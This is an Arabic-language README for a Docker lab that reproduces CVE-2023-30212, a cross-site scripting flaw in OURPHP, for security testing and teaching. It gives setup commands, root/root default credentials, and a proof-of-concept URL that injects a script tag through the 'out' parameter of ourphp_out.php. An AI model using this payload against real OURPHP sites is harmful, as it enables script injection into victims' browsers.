
بيئة مختبرية قائمة على Docker لإعادة إنتاج CVE-2023-30212، وهي ثغرة XSS في OURPHP، مع تعليمات إعداد خطوة بخطوة للاختبار الأمني والتعليم.
المتطلبات الأساسية
تحميل docker.io
sudo apt install -y docker.io
قم بتنزيل جميع الملفات من مستودعي باستخدام الأمر التالي.
git clone https://github.com/AAsh035/CVE-2023-30212.git
الآن لإنشاء صورة Docker، قم بتشغيل الأمر التالي:
sudo docker build -t vuln .
الخطوة التالية هي تحويل صورة Docker إلى حاوية. تحتاج الحاوية إلى العمل على المنفذ 80. الأمر هو:
sudo docker run -d -p 80:80 vuln
للتحقق من أن الحاوية تعمل، استخدم الأمر:
sudo docker ps
اكتب 127.0.0.1 في المتصفح وستظهر صفحة OURPHP.
تحتاج إلى تكوين ourphp بما يلي:
اسم المستخدم: root
كلمة المرور: root
اسم قاعدة البيانات: vuln
الآن تحتاج إلى تكوين اسم المستخدم وكلمة المرور للإدارة. قم بتعيين ما يلي:
اسم المستخدم: root
كلمة المرور: root
الآن قم بنسخ الرابط أدناه ولصقه في المتصفح:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0